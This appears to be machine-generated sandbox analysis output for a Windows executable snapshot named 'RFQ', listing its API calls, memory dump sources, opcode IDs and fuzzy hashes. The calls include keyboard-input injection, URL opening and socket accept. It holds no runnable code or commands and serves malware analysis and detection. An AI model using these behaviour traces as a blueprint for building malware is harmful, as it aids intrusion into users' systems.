• CoInitialize.OLE32(00000000), ref: 0078AAB4
• CoUninitialize.OLE32 ref: 0078AABF
  • Part of subcall function 00770213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0077027B
• VariantInit.OLEAUT32(?), ref: 0078AACA
• VariantClear.OLEAUT32(?), ref: 0078AD9D
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
APIs
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
APIs
Similarity
• API ID: _memset$__filbuf__getptd_noexit_memcpy_s
• String ID:
• API String ID: 3877424927-0
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(01046358,?), ref: 0079C544
                                                                                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0079C574
                                                                                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0079C5DA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                    • Opcode ID: 45783830ef2f7b4adf91738c852b0ba1199f09d44d158407556bbc74591aacb8
                                                                                                                                                    • Instruction ID: 5e6889ebeab36e0407445e5e9c47dde44c835ef35ae7728571d274d107d69941
                                                                                                                                                    • Opcode Fuzzy Hash: 45783830ef2f7b4adf91738c852b0ba1199f09d44d158407556bbc74591aacb8
                                                                                                                                                    • Instruction Fuzzy Hash: F9515D75A00204EFCF21DF68D880AAE7BB6EB55324F208259F9659B290D738ED41CB90
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0076C462
                                                                                                                                                    • __itow.LIBCMT ref: 0076C49C
                                                                                                                                                      • Part of subcall function 0076C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0076C753
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0076C505
                                                                                                                                                    • __itow.LIBCMT ref: 0076C55A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                                    • Opcode ID: 0971c12d263a88fc7ead7acec967cd5724cffe3f7c1bdaa962d94c1e25051505
                                                                                                                                                    • Instruction ID: ef6e371ec846b17a71c8afe7a6823ef6e22719cf8632647b0a463d2c54d0d479
                                                                                                                                                    • Opcode Fuzzy Hash: 0971c12d263a88fc7ead7acec967cd5724cffe3f7c1bdaa962d94c1e25051505
                                                                                                                                                    • Instruction Fuzzy Hash: 5041B971600208AFEF22EF54CC55FFE7BB9AF49700F000025FD46A7192DB789A558B51
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00773966
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00773982
                                                                                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007739EF
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00773A4D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                    • Opcode ID: e92dbf6f354f88b33c28ea4aff40dac6f0b6ecd50d5920416c7e81894b0948db
                                                                                                                                                    • Instruction ID: 0fac1a4b5607b954605296e542460a9eead4814dfacc915a0c65a2e17b9c385f
                                                                                                                                                    • Opcode Fuzzy Hash: e92dbf6f354f88b33c28ea4aff40dac6f0b6ecd50d5920416c7e81894b0948db
                                                                                                                                                    • Instruction Fuzzy Hash: C1413970E04208AAEF308B64880ABFDBBB59B45394F04C15AF5C9521C1C7BC9E95EB65
                                                                                                                                                    APIs
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0077E742
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0077E768
                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0077E78D
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0077E7B9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                    • Opcode ID: 2be61a1152576d104d79ca337ab7a15456dec7585333f2a4865e942de80e7297
                                                                                                                                                    • Instruction ID: e8c3184269b8a80834182763ea5118452a986897b106f793240d8dc54d9afcb4
                                                                                                                                                    • Opcode Fuzzy Hash: 2be61a1152576d104d79ca337ab7a15456dec7585333f2a4865e942de80e7297
                                                                                                                                                    • Instruction Fuzzy Hash: E1411639600610DFCF15EF14C489A4DBBE5BF59710F19C498E94AAB3A2CB78EC00CB91
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0079B5D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: 474a3c137f7cfcfe3cac389c76fbad28da080697c6e3fa6d165a6d1e45f47725
                                                                                                                                                    • Instruction ID: d204c3a0456de63949efd6f0dba8bfb65a98cb7416eb104a703ffbf2b7b457b4
                                                                                                                                                    • Opcode Fuzzy Hash: 474a3c137f7cfcfe3cac389c76fbad28da080697c6e3fa6d165a6d1e45f47725
                                                                                                                                                    • Instruction Fuzzy Hash: BC31BE74601208FBEF308F18FE89FA87765AB05350F558111FA51D62E1DB3CB950DB56
                                                                                                                                                    APIs
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0079D807
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0079D87D
                                                                                                                                                    • PtInRect.USER32(?,?,0079ED5A), ref: 0079D88D
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 0079D8FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                    • Opcode ID: 18df3b2b78d9fd49ba7b38dbb89f7d19e54c51911dfce2b41bd00c87b4667520
                                                                                                                                                    • Instruction ID: 393f862dc298309cbf20befdf1d1694d491e86d5708ce31233399f848e86e5ae
                                                                                                                                                    • Opcode Fuzzy Hash: 18df3b2b78d9fd49ba7b38dbb89f7d19e54c51911dfce2b41bd00c87b4667520
                                                                                                                                                    • Instruction Fuzzy Hash: 30414774A00219DFCF21DF59E884FA97BB5FF49360F1881A9E814DB262D738AD45CB40
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00773AB8
                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00773AD4
                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00773B34
                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00773B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: ad12840d8982c28bb0f8bda4ea72d8ce6997d63efd6014bc48e243c359afdfe9
• Instruction ID: ec9554fe80e3d62d9789c934f01ab661fface240f2bf0812d3c0c55a5bd43840
• Opcode Fuzzy Hash: ad12840d8982c28bb0f8bda4ea72d8ce6997d63efd6014bc48e243c359afdfe9
• Instruction Fuzzy Hash: DC3128B0A00258EEEF318B64881DBFD7BA59B55390F04825AE4C9932E2C77C8F45E765
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00764038
• __isleadbyte_l.LIBCMT ref: 00764066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00764094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007640CA
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 9ee883a3dacb8846520db5b84ca5a0b14baf79f85e814fc1bab56e9af8a5c4cc
• Instruction ID: 0a46767bf3ca553ee63d5eec1c24df51624d84169d6f6bc371bb35471046462d
• Opcode Fuzzy Hash: 9ee883a3dacb8846520db5b84ca5a0b14baf79f85e814fc1bab56e9af8a5c4cc
• Instruction Fuzzy Hash: 6831E43160022AEFDB219F34C844BBB7BA5FF40311F1580A8EE6287091E739DC90D790
APIs
• GetForegroundWindow.USER32 ref: 00797CB9
  • Part of subcall function 00775F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00775F6F
  • Part of subcall function 00775F55: GetCurrentThreadId.KERNEL32 ref: 00775F76
  • Part of subcall function 00775F55: AttachThreadInput.USER32(00000000,?,0077781F), ref: 00775F7D
• GetCaretPos.USER32(?), ref: 00797CCA
• ClientToScreen.USER32(00000000,?), ref: 00797D03
• GetForegroundWindow.USER32 ref: 00797D09
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 9ee0ea3c051d7a6b6df49b07d126526f15341b85e9909e61a66e53da4b3c7dac
• Instruction ID: 3be14e7c4a138fd9ea55b3ca28258aa012de2cd8b39df34f1dbda5d10520d27a
• Opcode Fuzzy Hash: 9ee0ea3c051d7a6b6df49b07d126526f15341b85e9909e61a66e53da4b3c7dac
• Instruction Fuzzy Hash: AC31FE72D00108AFDB11EFA5D8859EFBBF9EF58314B10846AF815E7211DB359E15CBA0
APIs
  • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
• GetCursorPos.USER32(?), ref: 0079F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007AE4C0,?,?,?,?,?), ref: 0079F226
• GetCursorPos.USER32(?), ref: 0079F270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007AE4C0,?,?,?), ref: 0079F2A6
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: 490f75575e6527f7037848bca71a36183fbe758973c7ac46d2ec0492e1db5c5a
• Instruction ID: cfde4fa39dc56c9067643e8e565a31d00ff3006b948c2287835a5481d97e0715
• Opcode Fuzzy Hash: 490f75575e6527f7037848bca71a36183fbe758973c7ac46d2ec0492e1db5c5a
• Instruction Fuzzy Hash: AA215C39500018EFCF298F95D858EEE7BB9FF09710F448169F9058B2A1D7389D91DB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00784358
  • Part of subcall function 007843E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00784401
  • Part of subcall function 007843E2: InternetCloseHandle.WININET(00000000), ref: 0078449E
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 707b7ec24473240473cae55f10848741ee8d79e1f47cab1191f83514d441d8b2
• Instruction ID: 8fda2fbca8af4bc0f98de33ea9992f286d3c510739a1b2857cca384a99209ed1
• Opcode Fuzzy Hash: 707b7ec24473240473cae55f10848741ee8d79e1f47cab1191f83514d441d8b2
• Instruction Fuzzy Hash: 4F21C335280706BFEB25AF60DC04FBBB7A9FF44710F10411AFA15A6A50DBB998219794
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00788AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00788AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00788AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00788B16
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: b639a6668eb1086e6e5df83367bc7c395afa792d7740d6e50ba009c34f03158f
• Instruction ID: a489d9247178b8d38d56868b4eba5d8f1d53e17b1f7f3471f664d5cd1032163a
• Opcode Fuzzy Hash: b639a6668eb1086e6e5df83367bc7c395afa792d7740d6e50ba009c34f03158f
• Instruction Fuzzy Hash: DB219672A001249FC7219F68C885EDEBBECEF49350F008169F849D7251DB789E418FA0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00798AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00798AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00798ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00798ADC
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 91422d5d2773dfc32c91834fd70de1372f147dc41e263ca789b8436364995790
• Instruction ID: 2cd7c8574671cdcb9ef2795f2f82e93211d9306fd64d0da74764cfc2725d41af
• Opcode Fuzzy Hash: 91422d5d2773dfc32c91834fd70de1372f147dc41e263ca789b8436364995790
• Instruction Fuzzy Hash: 1211E631305111AFEB54AB18DC09FBA7799FF86320F14811AF81AC72E2DB78AC018795
APIs
  • Part of subcall function 00771E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?), ref: 00771E77
  • Part of subcall function 00771E68: lstrcpyW.KERNEL32(00000000,?,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00771E9D
  • Part of subcall function 00771E68: lstrcmpiW.KERNEL32(00000000,?,00770ABB,?,?,?,0077187A,00000000,000000EF,00000119,?,?), ref: 00771ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770AD4
• lstrcpyW.KERNEL32(00000000,?,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,0077187A,00000000,000000EF,00000119,?,?,00000000), ref: 00770B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                    • String ID: cdecl
                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                    • Opcode ID: 76bca2a8c2a27e3a54704287180c2b079005ac46831ef86fe0ea0b69f364678d
                                                                                                                                                    • Instruction ID: 08de5a81eb396e12a6e3be9ed31017ef247c053062402a006524143334f62932
                                                                                                                                                    • Opcode Fuzzy Hash: 76bca2a8c2a27e3a54704287180c2b079005ac46831ef86fe0ea0b69f364678d
                                                                                                                                                    • Instruction Fuzzy Hash: 3511B476200305EFDF259F34DC05E7A77A8FF45354B80812AE809CB260EB759951C7E0
APIs
• _free.LIBCMT ref: 00762FB5
  • Part of subcall function 0075395C: __FF_MSGBANNER.LIBCMT ref: 00753973
  • Part of subcall function 0075395C: __NMSG_WRITE.LIBCMT ref: 0075397A
  • Part of subcall function 0075395C: RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: e4835b190489d5cd2ed29f052d64a4a828c68edb01727083810cea2991fd2900
• Instruction ID: 75473d6ab759067330352b12d7b63a521c5981201e29e4177d3878da0a7ee763
• Opcode Fuzzy Hash: e4835b190489d5cd2ed29f052d64a4a828c68edb01727083810cea2991fd2900
• Instruction Fuzzy Hash: 1F11CD31509615DBDB353B70AC097EE3B98AF04362F208525FC4A9A152DB7DCD44D6A4
APIs
• _memset.LIBCMT ref: 0074EBB2
  • Part of subcall function 007351AF: _memset.LIBCMT ref: 0073522F
  • Part of subcall function 007351AF: _wcscpy.LIBCMT ref: 00735283
  • Part of subcall function 007351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00735293
• KillTimer.USER32(?,00000001,?,?), ref: 0074EC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0074EC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007A3C88
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 95816acf6e80396a0ca6c7871001198f4f13b129c6d6872f2304daa8afa172a6
• Instruction ID: e26f6c33c556ca0a5675a2dad8ce5d4946a981abbdc20a80425075167c9e10ae
• Opcode Fuzzy Hash: 95816acf6e80396a0ca6c7871001198f4f13b129c6d6872f2304daa8afa172a6
• Instruction Fuzzy Hash: 1121D7709047849FE7329B288C59BE7BBECAB42318F04058DF68A56281D77C2A84CB61
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007705AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007705C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007705DD
• FreeLibrary.KERNEL32(?), ref: 00770632
Memory Dump Source
